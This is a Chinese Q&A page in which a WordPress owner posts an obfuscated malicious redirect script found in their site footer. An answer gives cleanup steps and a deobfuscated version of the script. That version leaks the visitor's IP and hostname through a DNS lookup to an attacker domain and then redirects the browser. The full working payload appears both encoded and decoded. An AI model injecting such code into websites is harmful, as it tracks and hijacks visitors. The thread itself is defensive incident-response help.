WordPress页脚中的Javascript注入重定向黑客代码,它来自哪里?
问题描述 投票:0回答:1
我正在拼命寻找注入到我的 WordPress 网站页脚中的这组代码。扫描仪插件找不到它。我的托管提供商运行了扫描,但也找不到它。我在Visual Studio Code中手动搜索网站文件中的代码,什么也没有。
下面是完整的恶意代码。这些数字会转化为恶意外部域。网站是
vulair.com非常感谢你们提前提供的帮助!
<script>
document.write(String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 118, 97, 114, 32, 95, 36, 95, 97, 55, 57, 56, 61, 91, 34, 92, 120, 50, 69, 34, 44, 34, 92, 120, 50, 68, 34, 44, 34, 92, 120, 55, 50, 92, 120, 54, 53, 92, 120, 55, 48, 92, 120, 54, 67, 92, 120, 54, 49, 92, 120, 54, 51, 92, 120, 54, 53, 92, 120, 52, 49, 92, 120, 54, 67, 92, 120, 54, 67, 34, 44, 34, 92, 120, 54, 57, 92, 120, 55, 48, 34, 44, 34, 92, 120, 51, 65, 34, 44, 34, 92, 120, 54, 56, 92, 120, 54, 70, 92, 120, 55, 51, 92, 120, 55, 52, 92, 120, 54, 69, 92, 120, 54, 49, 92, 120, 54, 68, 92, 120, 54, 53, 34, 44, 34, 92, 120, 54, 67, 92, 120, 54, 70, 92, 120, 54, 51, 92, 120, 54, 49, 92, 120, 55, 52, 92, 120, 54, 57, 92, 120, 54, 70, 92, 120, 54, 69, 34, 44, 34, 34, 44, 34, 92, 120, 55, 53, 92, 120, 54, 69, 92, 120, 54, 66, 92, 120, 50, 69, 92, 120, 54, 51, 92, 120, 54, 70, 92, 120, 54, 68, 34, 44, 34, 92, 120, 52, 49, 92, 120, 54, 69, 92, 120, 55, 51, 92, 120, 55, 55, 92, 120, 54, 53, 92, 120, 55, 50, 34, 44, 34, 92, 120, 55, 52, 92, 120, 55, 57, 92, 120, 55, 48, 92, 120, 54, 53, 34, 44, 34, 92, 120, 54, 52, 92, 120, 54, 49, 92, 120, 55, 52, 92, 120, 54, 49, 34, 44, 34, 92, 120, 54, 54, 92, 120, 54, 70, 92, 120, 55, 50, 92, 120, 52, 53, 92, 120, 54, 49, 92, 120, 54, 51, 92, 120, 54, 56, 34, 44, 34, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 54, 55, 92, 120, 55, 52, 92, 120, 54, 56, 34, 44, 34, 92, 120, 55, 50, 92, 120, 54, 53, 92, 120, 55, 48, 92, 120, 54, 67, 92, 120, 54, 49, 92, 120, 54, 51, 92, 120, 54, 53, 34, 44, 34, 92, 120, 55, 52, 92, 120, 54, 56, 92, 120, 54, 53, 92, 120, 54, 69, 34, 44, 34, 92, 120, 54, 65, 92, 120, 55, 51, 92, 120, 54, 70, 92, 120, 54, 69, 34, 44, 34, 92, 120, 54, 56, 92, 120, 55, 52, 92, 120, 55, 52, 92, 120, 55, 48, 92, 120, 55, 51, 92, 120, 51, 65, 92, 120, 50, 70, 92, 120, 50, 70, 92, 120, 54, 52, 92, 120, 54, 69, 92, 120, 55, 51, 92, 120, 50, 69, 92, 120, 54, 55, 92, 120, 54, 70, 92, 120, 54, 70, 92, 120, 54, 55, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 50, 70, 92, 120, 55, 50, 92, 120, 54, 53, 92, 120, 55, 51, 92, 120, 54, 70, 92, 120, 54, 67, 92, 120, 55, 54, 92, 120, 54, 53, 92, 120, 51, 70, 92, 120, 54, 69, 92, 120, 54, 49, 92, 120, 54, 68, 92, 120, 54, 53, 92, 120, 51, 68, 34, 44, 34, 92, 120, 55, 50, 92, 120, 54, 49, 92, 120, 54, 69, 92, 120, 54, 52, 92, 120, 54, 70, 92, 120, 54, 68, 34, 44, 34, 92, 120, 54, 54, 92, 120, 54, 67, 92, 120, 54, 70, 92, 120, 54, 70, 92, 120, 55, 50, 34, 44, 34, 92, 120, 50, 69, 92, 120, 54, 49, 92, 120, 54, 52, 92, 120, 55, 51, 92, 120, 50, 68, 92, 120, 55, 48, 92, 120, 55, 50, 92, 120, 54, 70, 92, 120, 54, 68, 92, 120, 54, 70, 92, 120, 50, 69, 92, 120, 54, 51, 92, 120, 54, 70, 92, 120, 54, 68, 92, 120, 50, 54, 92, 120, 55, 52, 92, 120, 55, 57, 92, 120, 55, 48, 92, 120, 54, 53, 92, 120, 51, 68, 92, 120, 55, 52, 92, 120, 55, 56, 92, 120, 55, 52, 34, 44, 34, 92, 120, 54, 56, 92, 120, 55, 52, 92, 120, 55, 52, 92, 120, 55, 48, 92, 120, 55, 51, 92, 120, 51, 65, 92, 120, 50, 70, 92, 120, 50, 70, 92, 120, 54, 49, 92, 120, 55, 48, 92, 120, 54, 57, 92, 120, 51, 54, 92, 120, 51, 52, 92, 120, 50, 69, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 54, 57, 92, 120, 54, 54, 92, 120, 55, 57, 92, 120, 50, 69, 92, 120, 54, 70, 92, 120, 55, 50, 92, 120, 54, 55, 92, 120, 51, 70, 92, 120, 54, 54, 92, 120, 54, 70, 92, 120, 55, 50, 92, 120, 54, 68, 92, 120, 54, 49, 92, 120, 55, 52, 92, 120, 51, 68, 92, 120, 54, 65, 92, 120, 55, 51, 92, 120, 54, 70, 92, 120, 54, 69, 34, 93, 59, 40, 102, 117, 110, 99, 116, 105, 111, 110, 40, 95, 48, 120, 49, 67, 55, 68, 52, 41, 123, 102, 101, 116, 99, 104, 40, 95, 36, 95, 97, 55, 57, 56, 91, 50, 49, 93, 41, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 53, 93, 93, 40, 40, 95, 48, 120, 49, 67, 56, 49, 68, 41, 61, 62, 95, 48, 120, 49, 67, 56, 49, 68, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 54, 93, 93, 40, 41, 41, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 53, 93, 93, 40, 40, 95, 48, 120, 49, 67, 56, 65, 70, 41, 61, 62, 123, 95, 48, 120, 49, 67, 56, 65, 70, 61, 32, 95, 48, 120, 49, 67, 56, 65, 70, 91, 95, 36, 95, 97, 55, 57, 56, 91, 51, 93, 93, 91, 95, 36, 95, 97, 55, 57, 56, 91, 50, 93, 93, 40, 95, 36, 95, 97, 55, 57, 56, 91, 48, 93, 44, 95, 36, 95, 97, 55, 57, 56, 91, 49, 93, 41, 59, 95, 48, 120, 49, 67, 56, 65, 70, 61, 32, 95, 48, 120, 49, 67, 56, 65, 70, 91, 95, 36, 95, 97, 55, 57, 56, 91, 50, 93, 93, 40, 95, 36, 95, 97, 55, 57, 56, 91, 52, 93, 44, 95, 36, 95, 97, 55, 57, 56, 91, 49, 93, 41, 59, 108, 101, 116, 32, 95, 48, 120, 49, 67, 56, 54, 54, 61, 119, 105, 110, 100, 111, 119, 91, 95, 36, 95, 97, 55, 57, 56, 91, 54, 93, 93, 91, 95, 36, 95, 97, 55, 57, 56, 91, 53, 93, 93, 59, 105, 102, 40, 95, 48, 120, 49, 67, 56, 54, 54, 61, 61, 32, 95, 36, 95, 97, 55, 57, 56, 91, 55, 93, 41, 123, 95, 48, 120, 49, 67, 56, 54, 54, 61, 32, 95, 36, 95, 97, 55, 57, 56, 91, 56, 93, 125, 59, 102, 101, 116, 99, 104, 40, 95, 36, 95, 97, 55, 57, 56, 91, 49, 55, 93, 43, 32, 95, 48, 120, 49, 67, 56, 54, 54, 43, 32, 95, 36, 95, 97, 55, 57, 56, 91, 48, 93, 43, 32, 95, 48, 120, 49, 67, 56, 65, 70, 43, 32, 95, 36, 95, 97, 55, 57, 56, 91, 48, 93, 43, 32, 77, 97, 116, 104, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 57, 93, 93, 40, 77, 97, 116, 104, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 56, 93, 93, 40, 41, 42, 32, 49, 48, 50, 52, 42, 32, 49, 48, 50, 52, 42, 32, 49, 48, 41, 43, 32, 95, 36, 95, 97, 55, 57, 56, 91, 50, 48, 93, 41, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 53, 93, 93, 40, 40, 95, 48, 120, 49, 67, 56, 49, 68, 41, 61, 62, 95, 48, 120, 49, 67, 56, 49, 68, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 54, 93, 93, 40, 41, 41, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 53, 93, 93, 40, 40, 95, 48, 120, 49, 67, 56, 70, 56, 41, 61, 62, 123, 105, 102, 40, 95, 48, 120, 49, 67, 56, 70, 56, 91, 95, 36, 95, 97, 55, 57, 56, 91, 57, 93, 93, 61, 61, 32, 110, 117, 108, 108, 41, 123, 114, 101, 116, 117, 114, 110, 125, 59, 118, 97, 114, 32, 95, 48, 120, 49, 67, 57, 52, 49, 61, 95, 36, 95, 97, 55, 57, 56, 91, 55, 93, 59, 95, 48, 120, 49, 67, 56, 70, 56, 91, 95, 36, 95, 97, 55, 57, 56, 91, 57, 93, 93, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 50, 93, 93, 40, 40, 95, 48, 120, 49, 67, 57, 56, 65, 41, 61, 62, 123, 105, 102, 40, 95, 48, 120, 49, 67, 57, 56, 65, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 48, 93, 93, 61, 61, 32, 49, 54, 41, 123, 95, 48, 120, 49, 67, 57, 52, 49, 43, 61, 32, 95, 48, 120, 49, 67, 57, 56, 65, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 49, 93, 93, 125, 125, 41, 59, 95, 48, 120, 49, 67, 57, 52, 49, 61, 32, 97, 116, 111, 98, 40, 95, 48, 120, 49, 67, 57, 52, 49, 41, 59, 105, 102, 40, 33, 95, 48, 120, 49, 67, 57, 52, 49, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 51, 93, 93, 41, 123, 114, 101, 116, 117, 114, 110, 125, 59, 119, 105, 110, 100, 111, 119, 91, 95, 36, 95, 97, 55, 57, 56, 91, 54, 93, 93, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 52, 93, 93, 40, 95, 48, 120, 49, 67, 57, 52, 49, 41, 125, 41, 125, 41, 125, 41, 40, 41, 60, 47, 115, 99, 114, 105, 112, 116, 62));
</script>
<link rel='stylesheet' id='so-css-astra-css' href='http://vulair.com/wp-content/uploads/so-css/so-css-astra.css?ver=1696128972' media='all' />
1个回答
0
投票
投票
很难精确定位这种混淆的注入,但您可以尝试定位大致的注入范围:
- 关闭所有插件并检查是否仍在注入。如果没有 - 将它们一一打开。
- 对主题重复相同的步骤。暂时切换到 WordPress 默认主题。
- 如果您正在使用缓存 - 尝试禁用它(而不是删除它 - 这样您可以稍后调查)并查看它是否有助于找到它。
如果上述步骤没有帮助,您还可以尝试转储所有
hooksfunction.phpprint_r($GLOBALS['wp_filter']);
并仔细检查
crons$cron_jobs = get_option( 'cron' );
var_dump($cron_jobs);
这可以帮助您确定注入是否是从 Wordpress 内部调用的。
在服务器端,您可以尝试搜索所有 Web 服务器配置文件(例如 Apache 的
.htaccessnginx.conf我尝试对代码进行反混淆,这就是我得到的:
(function (_0x1C7D4) {
fetch('https://api64.ipify.org?format=json').then(_0x1C81D => _0x1C81D.json()).then(_0x1C8AF => {
_0x1C8AF = _0x1C8AF.ip.replaceAll('.', '-');
_0x1C8AF = _0x1C8AF.replaceAll(':', '-');
let _0x1C866 = window.location.hostname;
if (_0x1C866 == '') {
_0x1C866 = 'unk.com';
};
fetch('https://dns.google/resolve?name=' + _0x1C866 + '.' + _0x1C8AF + '.' + Math.floor(Math.random() * 1024 * 1024 * 10) + '.ads-promo.com&type=txt').then(_0x1C81D => _0x1C81D.json()).then(_0x1C8F8 => {
if (_0x1C8F8.Answer == null) {
return;
};
var _0x1C941 = '';
_0x1C8F8.Answer.forEach(_0x1C98A => {
if (_0x1C98A.type == 16) {
_0x1C941 += _0x1C98A.data;
}
});
_0x1C941 = atob(_0x1C941);
if (!_0x1C941.length) {
return;
};
window.location.replace(_0x1C941);
});
});
})();
最新问题
- 根据列值对二维数组的行进行排序(不区分大小写),然后区分大小写
- C# 如何使用泛型参数类型作为接口的“嵌套”类型?
- 在 laravel docker 容器上出现不正确的错误
- IntelliJ IDEA 社区版中无法识别的 .sql 文件类型
- 如果不使用变量,为什么在这个 PL/SQL 函数中需要 INTO?
- 有没有办法在 DynamoDB 中同时使用主分区键和 GSI?
- 使用 Nodejs 提供静态文件
- Yii 随机数生成器函数
- 您可以将内联 Base64 编码图像添加到 Mandrill 模板吗?
- 重新排序元组列表以匹配列表中下一个元素的值
- 如何增加Picker选择宽度?
- Flutter Renderflex 溢出
- Zend 框架路由参数
- 扫描Laravel注释中特定命名空间下的路由
- 如何为meta_query添加另一个列表参数
- hacklang 的地图和矢量的 array_merge
- Laravel - 更改验证用户的错误消息
- WP-API 通过 id 获取多个页面
- Code Igniter 视图记住以前的变量!
- 禁用的 Azure SQL 用户仍然能够登录
© www.soinside.com 2019 - 2024. All rights reserved.